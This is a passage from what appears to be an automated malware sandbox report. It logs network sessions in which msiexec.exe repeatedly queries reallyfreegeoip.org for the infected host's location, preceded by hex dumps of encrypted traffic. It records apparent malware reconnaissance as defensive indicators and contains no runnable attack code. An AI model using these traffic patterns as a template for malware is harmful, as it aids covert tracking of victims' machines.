                                                                                                                                                            Data Ascii: KZ[DFWk^Aj|hYm3A},6U.B2]Dh^jH!5Lh4m*~1EW=0("d23`N;ITi,0#3)k'Cs=I4Y;f=fc+GYqt:Y?83siYjd
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: e2 c8 9e 9d 07 7a a2 b0 da d5 4f 03 9e 3b 4f b8 6f eb 0e 62 3f d0 f4 31 9f 64 bd 81 73 3c b5 c6 71 cf 1d 40 45 15 ef 0b d0 54 58 91 64 06 78 4f 92 bd fa c1 c5 15 62 58 61 ab 76 eb 80 a1 51 7e f4 c5 8d 89 66 18 07 b9 ba a5 11 fb 62 5f 9d 63 9d 1b 49 82 4b 1a 92 32 fe 55 78 8a 4d 52 fb 82 ad 27 ea 81 e5 8e 0b c2 19 1f 15 cc 6a ca 6e 03 ed 61 68 de 92 77 9d e5 b5 41 5e 7c ba da fd a0 09 78 c9 80 04 27 2c bc f4 0a 2e ca 27 cc 52 b6 10 05 a7 7c 43 ee 16 78 08 96 08 dd d8 c5 f6 7f 83 1a bd 54 63 12 64 9a 7d 7c d5 2e 6b 12 e7 e5 ad cb 7e a2 0d 06 2f e9 54 75 5c 13 cd 69 29 2c ab 48 a2 0f fd 1a 36 a7 9a c0 01 84 1a e3 77 a8 a3 8e 8d 38 67 f4 3d a7 ad cd e8 31 d9 c2 a2 78 ef 8c 96 a6 e6 fb c7 26 5a 76 a2 b7 36 3a 96 c7 70 4e c9 b2 8b de 02 ea b8 24 68 30 bd 39 5b
                                                                                                                                                            Data Ascii: zO;Oob?1ds<q@ETXdxObXavQ~fb_cIK2UxMR'jnahwA^|x',.'R|CxTcd}|.k~/Tu\i),H6w8g=1x&Zv6:pN$h09[
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: df 02 9b 1d 1b 1a 02 b5 e7 25 fb e0 cc 71 71 30 bc 02 28 d1 b0 02 24 98 fe 2c 70 3c 25 58 90 1c 50 4a a4 72 6f 00 9a b7 de fc af ee 58 85 6c 57 75 30 83 f5 67 bf c2 1c 87 ae fe c0 4a bc a8 20 4f e6 ad 42 a7 6b a3 e8 01 bc ad ba 95 27 1c 2c a7 1d 1a e0 de 4a e7 31 fa df 64 3c a7 c4 4b f2 be 69 d0 ac 4a 80 48 5e f4 a2 9b d0 10 00 d6 b5 e4 eb 15 5b 9f 96 f3 dc 16 29 e8 08 a9 26 c0 8e 66 e3 d8 ce bf ea 98 85 53 6f c1 54 4b f1 e9 04 b6 0c d9 8d 62 2f a2 d1 9a 7e d8 fa 7a ba 8e 9b 65 75 c2 4d b2 56 3c d9 5b 4c dd 62 1e a0 8a 10 e7 8d 97 27 8c 92 16 1a 43 f8 75 53 2a 80 b7 6b cd 9f 6c b5 5a 8a db 1c 3a ea 11 cb ae ab 52 5b a9 9f 36 a3 b5 13 6b 22 ca f7 53 c2 32 20 f7 6f 49 c4 5a 3c 60 d7 f9 89 5d ef b5 96 53 3a e3 1f 73 fe 9c 04 3b f2 54 29 9b 53 a5 80 48 ea 55
                                                                                                                                                            Data Ascii: %qq0($,p<%XPJroXlWu0gJ OBk',J1d<KiJH^[)&fSoTKb/~zeuMV<[Lb'CuS*klZ:R[6k"S2 oIZ<`]S:s;T)SHU
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: d6 5d 5e 9d 46 9c 3a e8 cf 4e 9c c8 9b c6 d5 90 b2 cf 81 d0 8c 35 df a8 3b 18 34 01 4b 0e 6e f8 85 01 f4 1b c3 e9 6e 45 f0 aa 79 ae fd d7 3e 6c a8 73 47 da 24 86 44 f7 99 63 f8 af ad 2a 9a ae ee 69 4b d1 18 49 3f 6c f8 c2 59 22 80 92 fb 9b 57 7b d2 18 70 3c 5e a5 46 f2 5f d8 69 3b 73 f1 5a 5e 8e 5f 4e e2 8d 65 f9 cb c2 38 5c 4a 94 8b c8 ae 55 ff e7 ca 4e a7 dc 81 73 56 a3 ac 7d 45 bc e4 ab f0 83 9f 0b 41 c6 8a 66 56 1c 0b 79 6b cf ec b1 5a aa 17 4e a1 a2 f4 d6 58 cb f3 43 8b 70 c5 0b 96 21 3d 40 af d7 28 39 c9 7c a8 b9 a9 bb 95 26 2d 3a af e9 a2 01 56 70 9e d6 64 e8 58 99 ef 7a 15 63 b1 d5 35 5c 93 c3 a6 dd 02 b8 b5 62 97 18 62 fa 8f b3 70 85 ab 62 05 26 9d af 39 a9 43 50 79 bd 73 b8 a9 da 52 12 f4 c3 01 87 58 46 86 e9 13 51 16 24 16 dd b2 e1 35 bd 65 24
                                                                                                                                                            Data Ascii: ]^F:N5;4KnnEy>lsG$Dc*iKI?lY"W{p<^F_i;sZ^_Ne8\JUNsV}EAfVykZNXCp!=@(9|&-:VpdXzc5\bbpb&9CPysRXFQ$5e$
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: 33 3c 6e 2e bd ca 4e 1f 51 35 e7 50 5d 69 65 6f f2 3d 0d 31 af 5e bb bb a7 9c 9b 22 5d 33 8e 99 92 12 2f c9 16 f8 03 df 5b 92 d4 48 7a 5c c0 38 b6 43 0b d6 c2 91 df 7f fd 0b 26 7f 84 8d 48 76 15 d0 f6 da e7 e6 c2 98 e3 26 85 02 54 91 0e fb 40 e3 e9 04 c5 36 cb 57 1b 9b 42 fc c3 97 4f 79 cf ae 11 b4 11 08 db 5b 81 43 90 9e 8b 4f 13 47 df cd 97 81 f4 93 ae b7 04 e5 44 af ee 70 3a d7 33 d2 3b 96 05 ee 6d 8c 2d 4b ee 75 fc 69 38 0b 8e 71 c9 80 19 00 ba 44 a4 ba 94 14 76 bb fb 2c da 88 42 69 24 94 d1 5c 30 bd 9e 28 aa 87 9e 48 e4 26 2d 3f 90 ea 5e 45 c2 8d 7f b9 4b b0 d9 05 73 4c cd ca 8c 3c 09 ca b2 26 33 41 2c 6d 1b 7f bb ee 31 e5 0d c2 4c 3a 82 53 06 d1 1f cf b4 1b af 96 8f 44 b3 32 c2 e8 6a 54 6a c3 b3 ac aa 13 1c b0 5f cd cb 34 48 1b 84 d5 82 83 e4 a0 2a
                                                                                                                                                            Data Ascii: 3<n.NQ5P]ieo=1^"]3/[Hz\8C&Hv&T@6WBOy[COGDp:3;m-Kui8qDv,Bi$\0(H&-?^EKsL<&3A,m1L:SD2jTj_4H*
                                                                                                                                                            2025-01-10 23:07:31 UTC1390INData Raw: 35 4c 65 b3 d5 82 87 97 1c 2a 91 7e 5e 99 b7 b0 94 7d 88 b1 2c 36 47 fd f4 a2 a1 9d b8 34 5c 33 a3 a6 6a 48 3d 7b b4 36 ef 83 d1 43 bc f3 5e cf f7 0b fe 9c 57 f2 8d 17 d5 ba 4e 5e f8 01 82 9d 99 d3 d7 6f fc 1d 74 b2 81 23 c6 e1 32 79 3f c2 59 5e cf 02 91 f7 ae 28 c4 74 9c a7 b3 97 dc 9d 10 81 45 20 28 c5 2e ed 81 77 ab 19 4b 26 17 61 46 9a 95 8a 1b 3c ab f6 72 60 41 db 10 a8 7d 2e 67 cd c6 d9 be 8e de bf e4 59 ae e4 9d 88 d6 83 cb ea 38 a0 09 cf 92 c5 e0 e3 00 c4 cb ec cb e7 ea a9 d3 48 af 86 0e e3 1c 07 7b 80 8b 24 d4 56 67 38 3d 76 1e 78 66 0d 74 17 a7 d1 27 eb 20 9d 81 7b 14 b1 ee 06 c9 72 f3 45 04 f0 51 89 41 58 eb 5f 4a 0a e6 89 c3 c1 bf e8 11 4a 16 13 04 6d 95 ef b0 46 52 09 8f 8d 83 7f a2 61 6c bf 8d db d3 34 55 e9 ea 8e 02 59 97 39 10 e8 c7 9e 3a
                                                                                                                                                            Data Ascii: 5Le*~^},6G4\3jH={6C^WN^ot#2y?Y^(tE (.wK&aF<r`A}.gY8H{$Vg8=vxft' {rEQAX_JJmFRal4UY9:


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            2192.168.2.1049981104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:34 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2025-01-10 23:07:34 UTC857INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:34 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865243
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rL3zTFPnT7SMelvEPGN5mOEgPMbCD%2B9xSpwU%2BCbZys98bbKfSYur2nkt4vlBoaZx5ttRzKjmpCWtqZNoHtU4YfO8bFdeSVe8H4la%2BaJXeSpCUsHvIJWeB5tLA9XQO%2FLY7p15vf1D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 900052f4b9848ce0-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1817&rtt_var=685&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1593886&cwnd=215&unsent_bytes=0&cid=1957a84cde6790e7&ts=254&x=0"
                                                                                                                                                            2025-01-10 23:07:34 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            3192.168.2.1049982104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:35 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            2025-01-10 23:07:35 UTC861INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:35 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865244
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HEahyY6BxutxFPUMY%2FNmwnuunHmh0ggkOTTMtY0rB3T1xN5Z06YX9zWEJPHrFybZ%2FfjSw4Q6%2F0KyJ9lvMzt%2BnaZ31H%2F4BdLxHjcsQT%2FBjoPpZ1bZyilvkIyVQiIXyOLOjMhIlIhH"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 900052fa1f697293-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2324&min_rtt=1911&rtt_var=1544&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=559279&cwnd=158&unsent_bytes=0&cid=98c27387cd59964d&ts=162&x=0"
                                                                                                                                                            2025-01-10 23:07:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            4192.168.2.1049984104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:36 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            2025-01-10 23:07:36 UTC857INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:36 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865245
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jqquSS2LgPItVaz4Vzvh%2F25Qe%2FEUgm3PThNgv1jWJxm4rlsLxJDzGEKlTf8IRv61PXz%2BC5gKIlFpRtswmkVhFZXAh2NXIuzdeT8pcXCFAARODH82TSGIqV9nxAYEVkG5dZ6rK9%2Fv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 900053029ea941ba-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1708&min_rtt=1695&rtt_var=662&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1622222&cwnd=192&unsent_bytes=0&cid=68a5447df9c103de&ts=156&x=0"
                                                                                                                                                            2025-01-10 23:07:36 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            5192.168.2.1049986104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:38 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            2025-01-10 23:07:38 UTC857INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:38 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865247
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1f4CiN8M7rD8bV8BVBM%2Be%2BN8c37p1lJ0vkhNW%2ByQeR7ZuOU9lvP1Ol4D%2FlMdY31mEUJ4vwsQKaT6nrVMf6TZCVSk2Hz5CXtvx9mmEZDWrZf5Ss9QmcjoBxuGsBWEnUlfmrz5hNK3"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 9000530b4dae8ce0-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1818&min_rtt=1815&rtt_var=687&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1584373&cwnd=215&unsent_bytes=0&cid=7a86bc9c7dde6808&ts=141&x=0"
                                                                                                                                                            2025-01-10 23:07:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            6192.168.2.1049988104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:39 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            2025-01-10 23:07:39 UTC854INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:39 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865248
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fNPi9ytozKv%2FZrIon483080GA979XwYBhGbMZN0KBI3r%2FpsWPjEoXcBdDQRGWLJHfMC42CcdyP3bDoYSs9d1DKJA0ov44au3nfJI3qMMaLF8a38OgSwSQuK2VQE0hHxKE%2BOXz4fr"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 900053137a4b1899-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1776&min_rtt=1607&rtt_var=942&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=985155&cwnd=153&unsent_bytes=0&cid=ce069b2e5c687978&ts=137&x=0"
                                                                                                                                                            2025-01-10 23:07:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            7192.168.2.1049990104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:40 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2025-01-10 23:07:40 UTC861INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:40 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865249
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xm%2BFCPWFPHjTQszeYJ24ScMmQ1tLu4JviNrxaGHseOScPY6P%2BLLvR7yyVQQ8G132UHFdP9bVVFmvG5vT9msBikWrJJfU%2B%2FUuTp1Nb8U6FVID%2BXrdw0d1A%2BvmlltN76zB4LkzOOaE"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 9000531c298c8ce0-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1743&min_rtt=1735&rtt_var=668&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1618625&cwnd=215&unsent_bytes=0&cid=b151724fd2815951&ts=147&x=0"
                                                                                                                                                            2025-01-10 23:07:40 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                            Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            8192.168.2.1049992104.21.16.14435752C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2025-01-10 23:07:42 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                            Host: reallyfreegeoip.org
                                                                                                                                                            2025-01-10 23:07:42 UTC863INHTTP/1.1 200 OK
                                                                                                                                                            Date: Fri, 10 Jan 2025 23:07:42 GMT
                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                            Content-Length: 362
                                                                                                                                                            Connection: close
                                                                                                                                                            Age: 1865251
                                                                                                                                                            Cache-Control: max-age=31536000
                                                                                                                                                            cf-cache-status: HIT
                                                                                                                                                            last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g2mJPr%2FgFZlcui1%2BBAXS11EJJfLwkI%2FjwXGXGg4u85afqWqbcl%2F%2By3We%2Fev2n9n9snWDg1IbVpIT5W0jdgxkmhhfL%2Bq8CNle9kQ91BLIeTE12yKxOg4Yp6LdkXepABIP3am0TdSA"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 90005324ce3c41ba-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
